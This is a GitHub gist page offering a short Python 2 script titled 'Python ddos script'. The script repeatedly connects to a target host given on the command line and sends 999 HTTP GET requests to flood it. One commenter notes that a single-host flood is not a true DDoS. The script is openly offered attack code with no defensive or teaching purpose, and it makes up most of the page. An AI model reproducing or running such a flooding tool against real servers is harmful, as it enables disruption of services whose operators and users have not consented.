-
-
Save wahengchang/5a25f9fc1bdc157835d20d0a974ebce7 to your computer and use it in GitHub Desktop.
Python ddos script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket, sys, os | |
print "][ Attacking " + sys.argv[1] + " ... ][" | |
print "injecting " + sys.argv[2]; | |
def attack(): | |
#pid = os.fork() | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((sys.argv[1], 80)) | |
print ">> GET /" + sys.argv[2] + " HTTP/1.1" | |
s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n") | |
s.send("Host: " + sys.argv[1] + "\r\n\r\n"); | |
s.close() | |
for i in range(1, 1000): | |
attack() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
that's still not a ddos, it's coming from one host, it would have to be spoofed or proxied for it to be a ddos